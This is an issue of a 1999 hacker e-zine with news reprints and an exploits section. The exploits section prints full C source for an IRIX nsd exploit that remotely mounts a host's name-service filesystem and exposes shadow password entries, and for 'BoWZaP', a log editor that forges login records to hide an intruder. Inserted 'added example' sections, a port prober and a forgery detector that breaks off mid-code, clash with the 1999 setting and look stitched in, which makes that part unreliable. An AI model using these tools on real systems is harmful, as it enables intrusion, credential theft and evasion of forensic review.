Antidote Vol. 02 Issue 08
Volume 2 Issue 8
6/11/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lin 1t.\n";
------------------------------
Yes! This is a special issue with an extra section of content: a one-time section, printed
only in this issue, about what is happening with AntiOnline. We have collected information
from other sites and put it together in this issue for you to see. It was written and
assembled by Lord Oak, and credit is given to every source it was taken from. Sorry that
there is not much news content in this issue; the AntiOnline portfolio took up a lot of
time and took away time from gathering news.
As of this issue, Antidote has over 670 subscribers and is gaining more every day! The
only thing we ask of you when you read Antidote is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together,
and visiting our sponsor takes you about 15 seconds (if that). So please visit our
sponsor; it is the only thing we ask of you.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News
1.01 - A Mouse that Roars
1.02 - Stanford Tracking Racist E-mails
2.00 - Exploits (new & older)
2.01 - nsdadv.c.txt
2.02 - bowzap.c.txt
2.03 - redhat6_0.permissions.dos.txt
2.04 - omnihttpd.webserver.txt
2.05 - windows.prn.txt
3.00 - Misc
3.01 - Red Box made easy
3.02 - Conventions & Expo's
3.03 - Securing Linux
----
--=\\AntiOnline Portfolio Contents\\=--
AO.00 - Info on AntiOnline
AO.01 - wired.com
AO.02 - E-mails from Attrition
AO.02A - Email #1
AO.02B - Email #2
AO.03 - AntiOnline's Response
AO.04 - Added Comments
----
FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just
something totally stupid and MAYBE even humorous to some.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plain making fun of something or someone.
FEAT.S - FEATURED SITES:
www.nudehackers.com
www.thepoison.org/masters/exploits.html
www.403-security.org
www.hackernews.com
------------------------------
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically,
is current news and happenings in the underground world. We aren't going to teach
you how to hack or anything, but we will supply you with the current information and
exploits. Mainly, Antidote is just a magazine for people to read if they have some extra
time on their hands and are bored with nothing to do. If you want to read a magazine
that teaches you how to hack etc., then you might want to go to your local bookstore and
see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to receive a lot, our "Frequently Asked
Questions". Please read this before e-mailing us with questions; if your question
isn't on here or doesn't make sense, then you can e-mail us with it.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote is not suited for the beginner and does not teach you the basics,
why is that?
Antidote is for everyone. All we basically are is a news e-zine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles in here are received second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there any way I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will receive a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.04 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you might
want to send it again because we probably didn't get it (we respond to all e-mails no
matter what). We might use your article in future issues of Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can; we take information that is written by anyone, regardless of whether you
wrote it or not.
Well, that's it for our FAQ. If you have a question that is not on here, or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and some are groups in general. If you are not on this list and you feel that for some
reason you should be, then please contact Lord Oak and he will post you on here; we
are sorry for the misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
PBBSER oX1dation
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-mail
lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submissions. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we receive two e-mails with the same topic/idea then we will use the one
that we received first. So it might be a good idea to e-mail one of us and ask whether
someone has already written on a topic, so that you don't waste your time writing
something that won't be published. An example of this would be:
If Joe sends us an e-mail with the topic being on hacking hotmail accounts on
Thursday,
and then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if we
like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News //-->
1.01 --=\\A Mouse that Roars\\=--
[www.washingtonpost.com]
Last week, Newsweek reported that President Clinton approved a covert operation in May
to find an electronic silver bullet to do what the White House at the time believed the
air war couldn't. According to the report, the CIA would conduct a cyberwar against
Milosevic, specifically going after his financial assets in banks throughout Europe.
Is the keyboard mightier than the sword?
Before Allied Force, the intelligence agencies held a cyberwar exercise to answer this
very question. At center stage was the Information Operations Technology Center (IOTC),
activated last year and made up of the best cyberwarriors of the U.S. government. Housed
at National Security Agency headquarters at Fort Meade, Md., IOTC brings together highly
secret capabilities: NSA's P42 information warfare cell, the CIA's Critical Defense
Technologies Division, the Pentagon's "special technology operations."
Military sources familiar with the March demonstration say there is no question that the
keyboard covert operators wowed the Joint Staff with their computer attack capabilities.
But they are adamant in insisting that cyberbombs are more laboratory technologies than
usable weapons. In fact, the sources point out, the only cyberwar raging is inside the
U.S. government where Washington lawyers and policymakers, military leaders, and
official hackers battle over the value and legality of network attack.
Where's The Bits?
The day bombs started falling on Yugoslavia, the Air Force Association convened a high-
level symposium in San Antonio, Tex., to address the status of information warfare.
Washingtonpost.com has obtained a transcript of the two-day proceeding.
Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the closed-door session
via satellite from his headquarters in Germany. "I have not had much sleep over the last
48 hours, and I am probably not as sharp or prepared as I would like to be," he
apologized.
Tired or not, the senior air force officer in Europe wasted no time blasting the bias of
information warriors to fight battles solely at the "strategic level." He was referring
to the very sort of effort Newsweek would speculate about two months later.
"When we hear talk of information warfare," Jumper said, "the mind conjures up notions
of taking some country's piece of sacred infrastructure in a way that is hardly relevant
to the commander at the operational and tactical level."
"I would submit that we are not there with information warfare," he concluded.
Networking Network Attack
Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and head of the
Pentagon's Joint Command and Control Warfare Center, followed Jumper.
"In my hat as the air force component commander for NSA," he warned, "I spend a lot of
time working ... on how to exploit what is going on out there in computer networks." But
when it comes to going beyond collecting computer transmissions as raw intelligence to
actually manipulating and exploiting the "zeroes and ones" for military value, Baker
said, "we have a ways to go."
Despite all the new information warfare organizations that have been established of
late, he lamented that cyberwarriors did not yet have the stature of other warriors:
"Effects-based warfare," that is, methods geared to achieve an outcome and not cause
traditional damage lacks the "visually pleasing destruction from an armed bomb."
Baker stressed that part of the problem in any kind of computer network attack is the
concerns on the part of policy-makers in Washington with regard to legality and
"traceability."
Jumper described his experience: "I picture myself around that same targeting table
where you have the fighter pilot, the bomber pilot, the special operations people and
the information warriors. As you go down the target list, each one takes a turn raising
his or her hand saying, 'I can take that target.' When you get to the info warrior, the
info warrior says, 'I can take the target, but first I have to go back to Washington and
get a finding.'"
Seeking permission invariably results in artificial restrictions and hesitations in
attacking targets, Jumper stressed. From a field perspective, he said, the process of
seeking the "special" operation cedes too much decision-making to inside the Beltway.
Finding The Way
The unusually candid discussions of the institutional and military stumbling blocks to
an information warfare future contrasts with the Hollywood vision of cyberwar so common
in the mainstream media these days.
Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within the area of
computer network exploitation, there is tremendous investment, which, with a little bit
of fine tuning, can be turned into a computer network attack capability."
The IOTC, Wright said, "is a great organization that has a bright future." He should
know. As Deputy Director for Information Operations for the Joint Chiefs of Staff, he is
the military head of the interagency center and the top cyber-warrior in the U.S.
military.
But the key word is future.
With the shooting war against Yugoslavia over, it should be crystal clear to anyone that
exotic American cyberbombs have not aided the effort in any way.
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm
------------------------------
1.02 --=\\Stanford Tracking Racist E-mails\\=--
[www.yahoo.com]
Stanford University has turned loose its electronic bloodhounds to track the source of
racist e-mail sent to 25,000 campus computer users over the weekend.
The one-paragraph message accused the university of giving preference in housing to non-
whites, said Rachel Lotan, a professor in the School of Education who received the e-
mail.
The message was so racist "it took my breath away," she said. "It must be someone
very angry."
A housing shortage for students has been a problem at Stanford for some time. Last week,
some 1,300 students were not selected in the lottery held for scarce campus housing.
Last year, almost 900 missed out.
Prosecutor Julius Finkelstein, head of Santa Clara County's high-tech crimes unit, said
the hacker could be charged with such offenses as unauthorized use of a computer account
and harassment via e-mail.
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html
------------------------------
10001010100101110101010101001011101010101000
0 1
1 Y88b Y88 888 888 888 88e e88'Y88 0
1 Y88b Y8 888 888 888 888b d888 'Y 1
0 b Y88b Y 8888888 888 8888D C8888 1
0 8b Y88b 888 888 888 888P Y888 ,d 1
1 88b Y88b 888 888 888 88" "88,d88 0
1 1
1 http://www.nudehackers.com 0
0 0
01001010110101010001011010010111010100101011
<!-- 2.00 - Exploits //-->
2.01 --=\\nsdadv.c.txt\\=--
I've been waiting since February for SGI to post an advisory about this.
Enough.
/******************************************************************************
IRIX 6.5 nsd virtual filesystem exploit
Author: Jefferson Ogata (JO317) <ogata@pobox.com>
Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
of this program constitutes your complete acceptance of all liability for
any damage or loss caused by the aforesaid use. It is provided to the
network community solely to document the existence of a vulnerability
in the security implementations of certain versions of IRIX, and may not
be used for any illicit purpose. Many of the details of the bug this
program exploits have been available to users of SGI's online support
system since February 1999. The current revision of IRIX (6.5.3) corrects
this bug, at least enough to stop this particular exploit, and I strongly
encourage you to bring your systems up to date as quickly as possible.
With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
lookups into a userland process called nsd, which exports the results of
the queries it fields into a virtual filesystem. The virtual filesystem is
normally mounted onto the directory /ns by the program /sbin/nsmount, which
is invoked by nsd on startup. The nsd daemon itself is exporting the
filesystem via NFS3 over a dynamically bound UDP port -- rather than a
well-known or settable one -- typically in the 1024-1029 range. On a
desktop system, 1024 is a good bet, since nsd is usually the first
RPC/UDP service to be started.
The NFS filesystem is not registered with mountd, so there is no way to
query mountd for a mount filehandle. But because the NFS port is fairly
easy to discover through port scanning, and because the mount filehandle
nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
filesystem from a host anywhere on the Internet. nsd will serve an array
of NFS requests to anyone. Furthermore, because the service's NFS port is
bound dynamically, it is difficult to protect it with a firewall; it may
change from one system start to another, or if the daemon is killed and
restarted.
This program can successfully mount the nsd-exported virtual filesystem
from a remote host onto a machine running IRIX 6.4 or higher. It makes use
of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
what this flag does at the NFS protocol level, but it allows the client to
ask the NFS server not to enforce certain permissions controls against the
client. I don't know whether any other vendor NFS client systems support
this flag. A clever person might write a userland NFS client that would
accept an initial handle, NFS port, etc. as arguments.
On an SGI with SGI C compiler, compile with:
cc -o nsdadv nsdadv.c
Run it this way:
nsdadv /mnt sucker.example.com 1024
with obvious substitutions.
So what are the security implications of this? Well, at the very least, the
nsd filesystem on an NIS server reveals the NIS domain name, and what maps
it contains, as well as what classes are being used.
By exploring the filesystem shortly after it has been mounted I have been
able to retrieve data that should be hidden from me, including shadow
password entries from a remote system's shadow file.
Beyond retrieving keys and maps, you can also monitor the filesystem for
changes. A great deal of information is leaked through the contents of the
nsd filesystem. For example, if host A looks up a host B's IP address, a
file named B will appear in the /.local/hosts.byname directory in A's nsd
filesystem. The file's contents will be the IP address.
By the way, though you may be unable to chdir into a particular location in
the nsd filesystem, you may yet succeed under slightly different
conditions. Eventually you can do it. I'm not sure why or when, but nsd
gets picky sometimes. Eventually it relents. Specifically, I've found that
the entire nsd filesystem appears readable for a few seconds after it is
initially mounted. If you can't look at something, unmount the filesystem,
remount it, and try again immediately. It also seems that a stat() is
sometimes required before a chdir(). Your mileage may vary, but keep
trying. You may wish to write a script to mount the nsd filesystem, explore
and take inventory of its contents, and unmount the filesystem quickly.
Once you've chdir'd into a directory, it appears you can always read it,
although you can't necessarily stat its contents. This suggests a strategy
of spawning a group of processes each with its cwd set to a subdirectory of
the nsd filesystem, in order to retain visibility on the entire filesystem.
Each process would generate an inventory of its cwd, and then monitor it
for changes. A Perl script could do this well.
Another thing: it is possible to create an empty file in nsd's exported
filesystem simply by stat()ing a nonexistent filename. This suggests a
potential DoS by creating many files in a directory.
Remember that the system keeps a local cache in /var/ns, so you may have
to wait for cached entries on the target host to expire before you'll see
them reappear in the virtual filesystem.
For some fairly extensive info on the nsd implementation, take a look at:
http://www.bitmover.com/lm/lamed_arch.html
******
What got me into all this was that I found I could no longer run services
chrooted if they required DNS. It took considerable effort to come up with
a solution to this. This was a fundamental change from IRIX 6.4, and I know
I'm not the only one who finds the nsd implementation to be a generally
unpleasant direction, in part because it causes umount -t nfs to break
system database services. I give SGI points for creativity -- in one sense,
using NFS as a database access system is a very slick approach. But the
database needs a security model, and the model needs to be implemented
correctly. Neither of these needs appears to have been met.
So how could SGI fix this?
Without going back, SGI could at least make nsd respond only to queries
from localhost (see note below about IRIX 6.5.3). The problem here is that
they actually intend to support remote mounts in later releases, in order
to supplement or supplant other means of distribution. The web documents
indicate this.
They could create a well-randomized mount filehandle for the filesystem
and pass that to nsmount. Then you couldn't remotely mount the filesystem
without guessing the handle -- nontrivial with a 32-byte handle.
At the very least, they should provide libraries of regular BIND resolver
routines, file-based getpwent, etc. routines, so one could choose the
resolution strategy at link time, perhaps by modifying the shared library
path.
******
With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
to some degree. The exploit does not appear to work as it does against
6.5.2. Further testing is needed, and the behavior should be watched
carefully in future versions of IRIX.
******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <mntent.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <rpc/types.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/mount.h>
#include <sys/fs/nfs.h>
#include <sys/fs/nfs_clnt.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE "nfs3"

/* File that records mounted filesystems. */
#define MTAB_FILE "/etc/mtab"

/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;

/* All zero file handle. This appears to be the base handle for the nsd
   filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };

/* NFS mount options structure to pass to mount(2). The meanings of these
   are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
   flags field indicates that this is a soft mount without log messages,
   and to set the initial timeout and number of retries from fields in
   this structure. The fh field is a pointer to the filehandle of the
   mount point, whose size is set by fh_len. As noted above, the mount
   point filehandle is just 32 zeroes. */
struct nfs_args nx =
{
  &sin,                                                 /* addr */
  (fhandle_t *) fh,                                     /* fh */
  NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC,  /* flags */
  0,                                                    /* wsize */
  0,                                                    /* rsize */
  100,                                                  /* timeo */
  2,                                                    /* retrans */
  0,                                                    /* hostname */
  0,                                                    /* acregmin */
  0,                                                    /* acregmax */
  0,                                                    /* acdirmin */
  0,                                                    /* acdirmax */
  0,                                                    /* symttl */
  { 0 },                                                /* base */
  0,                                                    /* namemax */
  NFS_FHSIZE,                                           /* fh_len */
  /* On IRIX 6.4 and up there are also the following... */
  /* bdsauto */
  /* bdswindow */
  /* On IRIX 6.5 there are also the following... */
  /* bdsbuflen */
  /* pid */
  /* maxthreads */
};

void usage (const char *prog)
{
  fprintf (stderr, "usage: %s directory host port\n\n", prog);
  fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host>, via the\n");
  fprintf (stderr, "UDP port <port> that nsd's NFS server is bound to, onto <directory>.\n\n");
  exit (1);
}

int main (int argc, char **argv)
{
  char *dir;
  char *host;
  char *ports;
  int port;
  struct hostent *h;
  int fstype;
  FILE *mtabf;
  struct mntent mnt =
  {
    0,
    0,
    NSD_FSTYPE,
    "soft,timeo=100,retrans=2",
    0,
    0,
  };

  if (argc != 4)
    usage (argv[0]);
  dir = argv[1];
  host = argv[2];
  ports = argv[3];
  port = atoi (ports);
  if (port <= 0 || port > 65535)
    {
      fprintf (stderr, "Bad port number: %s\n", ports);
      return 1;
    }

  /* Prepare for host lookup. The port goes in network byte order; on a
     big-endian MIPS box htons() is a no-op, but say what we mean. */
  memset ((void *) &sin, 0, sizeof (sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons ((unsigned short) port);

  /* Look up the host: dotted quad first, then the resolver. */
  if (inet_aton (host, &sin.sin_addr))
    ;
  else if ((h = gethostbyname (host)) && h->h_addrtype == AF_INET)
    memcpy (&sin.sin_addr, h->h_addr_list[0], sizeof (sin.sin_addr));
  else
    {
      fprintf (stderr, "Cannot resolve host %s.\n", host);
      return 1;
    }

  /* Get filesystem type index for nsd filesystem type. */
  if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
    {
      perror ("sysfs (" NSD_FSTYPE ")");
      return 1;
    }

  fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
           host, inet_ntoa (sin.sin_addr), port, dir);

  /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
     means "tell server to trust us with attributes" and MS_DATA means
     "6-argument mount".
     MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
     seem to work without this option. So even though this program will
     compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
     attack nsd. */
  if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
      != 0)
    {
      perror ("mount");
      return 1;
    }

  /* Record mount point in /etc/mtab so umount(1M) can find it later.
     sizeof (":nsd@") already counts the terminating NUL. */
  mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports));
  if (!mnt.mnt_fsname)
    {
      perror ("malloc");
      return 1;
    }
  sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
  mnt.mnt_dir = dir;
  if (!(mtabf = setmntent (MTAB_FILE, "r+")))
    {
      perror ("setmntent");
      return 1;
    }
  if (addmntent (mtabf, &mnt) < 0)
    {
      perror ("addmntent");
      return 1;
    }
  if (endmntent (mtabf) < 0)
    {
      perror ("endmntent");
      return 1;
    }
  return 0;
}
Jefferson Ogata
ogata@POBOX.COM
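The write-up above makes the point that nsd's NFS export is not registered with mountd, so the only way to find it is to probe the dynamic 1024-1029 range directly. The following C program is an added example for this issue, not part of Ogata's post or of SGI's code: it builds a bare ONC RPC NULL call for NFS program 100003, version 3 (RFC 5531 call framing with AUTH_NONE credentials) and recognises an accepted SUCCESS reply, which any live NFSv3 server returns no matter what it exports. probe_nfs3_udp() fires that call at one host:port over UDP with a two-second timeout, and main() walks ports 1024-1029 as the text suggests. The names (build_nfs3_null_call, is_nfs3_null_reply, probe_nfs3_udp) are the example's own, and the reply bytes checked in the usage note are constructed for the example.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* ONC RPC constants (RFC 5531) and the NFS program/version we are after. */
#define RPC_CALL       0
#define RPC_REPLY      1
#define RPC_VERSION    2
#define NFS_PROGRAM    100003
#define NFS_V3         3
#define NFSPROC3_NULL  0
#define AUTH_NONE      0
#define MSG_ACCEPTED   0
#define RPC_SUCCESS    0
#define MAX_AUTH_BYTES 400

static void put32(uint8_t *p, uint32_t v)
{
    p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
}

static uint32_t get32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Serialise an RPC CALL for NFSv3 procedure 0 (NULL) into buf. Every field
   is a big-endian 32-bit XDR word; the AUTH_NONE credential and verifier
   have empty bodies. Returns the message length (40 bytes). */
size_t build_nfs3_null_call(uint8_t *buf, uint32_t xid)
{
    const uint32_t words[10] = {
        xid, RPC_CALL, RPC_VERSION, NFS_PROGRAM, NFS_V3, NFSPROC3_NULL,
        AUTH_NONE, 0,          /* credential flavor, body length */
        AUTH_NONE, 0           /* verifier flavor, body length   */
    };
    size_t i;
    for (i = 0; i < 10; i++)
        put32(buf + 4 * i, words[i]);
    return 40;
}

/* Return 1 if buf holds an accepted, successful REPLY to the call with xid.
   Layout: xid, msg_type, reply_stat, verf flavor, verf length, verf body
   (padded to a multiple of 4), accept_stat. */
int is_nfs3_null_reply(const uint8_t *buf, size_t len, uint32_t xid)
{
    uint32_t verf_len;
    if (len < 24 || get32(buf) != xid) return 0;
    if (get32(buf + 4) != RPC_REPLY || get32(buf + 8) != MSG_ACCEPTED) return 0;
    verf_len = get32(buf + 16);
    if (verf_len > MAX_AUTH_BYTES) return 0;
    verf_len = (verf_len + 3) & ~3u;            /* XDR opaque padding */
    if (len < 24 + verf_len) return 0;
    return get32(buf + 20 + verf_len) == RPC_SUCCESS;
}

/* Send the NULL call to ip:port over UDP. 1 = an NFSv3 server answered,
   0 = no or invalid answer within two seconds, -1 = local error. */
int probe_nfs3_udp(const char *ip, int port)
{
    uint8_t req[40], rep[256];
    struct sockaddr_in sa;
    struct timeval tv = { 2, 0 };
    const uint32_t xid = 0x4e534431u;           /* any value; we match it on reply */
    ssize_t n;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);

    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons((uint16_t)port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) { close(fd); return -1; }
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    build_nfs3_null_call(req, xid);
    if (sendto(fd, req, sizeof req, 0, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;
    }
    n = recvfrom(fd, rep, sizeof rep, 0, NULL, NULL);
    close(fd);
    return n > 0 && is_nfs3_null_reply(rep, (size_t)n, xid);
}

int main(int argc, char **argv)
{
    int port, found = 0;
    if (argc != 2) { fprintf(stderr, "usage: %s <ipv4-address>\n", argv[0]); return 2; }
    for (port = 1024; port <= 1029; port++)     /* nsd's usual dynamic range */
        if (probe_nfs3_udp(argv[1], port) == 1) {
            printf("NFSv3 NULL call answered on udp/%d\n", port);
            found = 1;
        }
    return found ? 0 : 1;
}
```

A hit on one of these ports is the port you would hand to nsdadv; a hit on a port where no NFS server should be listening is also the simplest alarm for a defender to set, since it does not depend on whether the daemon bothered to register with the portmapper. The check is deliberately a NULL call, so it touches no filehandle and leaves nothing in the exported tree.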
------------------------------
2.02 --=\\bowzap.c.txt\\=--
/*
* BoWZaP 1.0 - k-sp1ff h4qR tYp3 l0g ed1t0r ph0r 4.4BSD/SunOS4/Linux
*
* say u r l0gg3d 1nt0 cert.org as 'sp4f' on ttyp2 & want t0 b
* m1sch13v0us.. u w0uld th3n d0:
*
* [sp4f@cert][~] % su -
* Password: b0w-t13z
* # ./BoWZaP sp4f justin.kalinas.home.machine ttyp2
*
* 0r t0 ch4ng3 4ll 1nst4nc3z 0f sp4f jU$t l34v3 0ut th3 ttY argUm3nt..
*
* u k4n alz0 uz3 1t t0 1mpr3$$ uR fr13ndz & tr1ck th3m 1nt0 g1v1ng
* u k0d3z .. i.e. m4k3 1t l00k l1k3 uR 0n fr0m zang.com or s0m3th1ng,
* th3n ppl w1ll l1k3 t0tally ph34r u & stUph.
*
* k0mp1l3 w/ [g]cc -O[2] -o BoWZaP BoWZaP.c [-DSUNOS] -s
*
* w0rd!@#
* - K0d3S|aY3r [b4dd3r & k-r4dd3r th4n ev3r 1n '99]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <utmp.h>
#include <pwd.h>
#ifdef SUNOS
#include <lastlog.h>
#define _PATH_UTMP "/etc/utmp"
#define _PATH_WTMP "/var/adm/wtmp"
#define _PATH_LASTLOG "/var/adm/lastlog"
#else
#include <paths.h>	/* _PATH_UTMP, _PATH_WTMP, _PATH_LASTLOG on 4.4BSD/Linux */
#endif

/* 1 if the record belongs to user and, when a tty was given, to that line. */
static int matches(const struct utmp *ut, const char *user, const char *tty)
{
	if(strncmp(ut->ut_name, user, strlen(user)))
		return 0;
	return tty == NULL || !strncmp(ut->ut_line, tty, strlen(tty));
}

int main(int ac, char **av)
{
	int fd;
	off_t off;
	struct utmp ut;
	struct lastlog ll;
	struct passwd *pw;
	const char *user, *host, *tty;

	if(ac < 3 || ac > 4) {
		fprintf(stderr,"Usage: %s user fakehost [tty]\n",av[0]);
		exit(1);
	}
	user = av[1];
	host = av[2];
	tty = (ac == 4) ? av[3] : NULL;

	if((pw = getpwnam(user)) == NULL) {
		fprintf(stderr,"Not in /etc/passwd.\n");
		exit(1);
	}

	/* utmp: rewrite the host of every live session that matches. The copy
	 * takes the whole field width out of av[2], so the bytes after its NUL
	 * are whatever argv/environment string follows it on the stack. */
	if((fd = open(_PATH_UTMP, O_RDWR)) < 0) {
		fprintf(stderr,"Couldn't open %s\n",_PATH_UTMP);
		exit(1);
	}
	while(read(fd, &ut, sizeof(ut)) == sizeof(ut)) {
		if(matches(&ut, user, tty)) {
			memcpy(ut.ut_host, host, sizeof(ut.ut_host));
			lseek(fd, -(off_t)sizeof(ut), SEEK_CUR);
			write(fd, &ut, sizeof(ut));
		}
	}
	close(fd);
	printf("%s successfully altered.\n", _PATH_UTMP);

	/* wtmp: walk backwards from the end and patch the newest match only. */
	if((fd = open(_PATH_WTMP, O_RDWR)) < 0) {
		fprintf(stderr,"Couldn't open %s\n",_PATH_WTMP);
		exit(1);
	}
	if(lseek(fd, -(off_t)sizeof(ut), SEEK_END) >= 0) {
		while(read(fd, &ut, sizeof(ut)) == sizeof(ut)) {
			if(matches(&ut, user, tty)) {
				memcpy(ut.ut_host, host, sizeof(ut.ut_host));
				lseek(fd, -(off_t)sizeof(ut), SEEK_CUR);
				write(fd, &ut, sizeof(ut));
				break;
			}
			/* one record back for the read, one more for the previous
			 * entry; a negative offset means we ran off the start */
			if(lseek(fd, -(off_t)(sizeof(ut) * 2), SEEK_CUR) < 0)
				break;
		}
	}
	close(fd);
	printf("%s successfully altered.\n",_PATH_WTMP);

	/* lastlog: one fixed-size slot per uid. Read the existing slot first so
	 * ll_time survives instead of being whatever was on the stack. */
	if((fd = open(_PATH_LASTLOG, O_RDWR)) < 0) {
		fprintf(stderr,"Couldn't open %s\n",_PATH_LASTLOG);
		exit(1);
	}
	off = (off_t)pw->pw_uid * sizeof(struct lastlog);
	if(lseek(fd, off, SEEK_SET) < 0 || read(fd, &ll, sizeof(ll)) != sizeof(ll))
		memset(&ll, 0, sizeof(ll));
	memcpy(ll.ll_host, host, sizeof(ll.ll_host));
	if(tty)
		memcpy(ll.ll_line, tty, sizeof(ll.ll_line));
	lseek(fd, off, SEEK_SET);
	write(fd, (char *)&ll, sizeof(ll));
	close(fd);
	printf("%s successfully altered.\n", _PATH_LASTLOG);
	return 0;
}
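BoWZaP needs root, which is why its own usage example starts with su; what a responder can still check afterwards is whether the fixed-width fields in utmp/wtmp look like login(1) wrote them. login zero-fills ut_host and ut_line and copies a NUL-terminated string into them, whereas the tool memcpy()s the full sizeof(ut_host) bytes out of a shorter argv string, so everything after the terminating NUL is whatever sat next to that string on the stack. The following C program is an added example for this issue, not part of the tool: it defines a constructed login record with the same three fixed-width fields, forges one the way the tool's memcpy does (from a constructed image of argv[2] followed by argv[3]), and flags fields that carry non-NUL bytes after their first NUL or non-printable characters. struct login_rec, field_has_trailing_garbage, field_has_unprintable and record_is_suspicious are the example's own names; the real struct utmp layout is platform-specific, but the rule applies to any fixed-width char field.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

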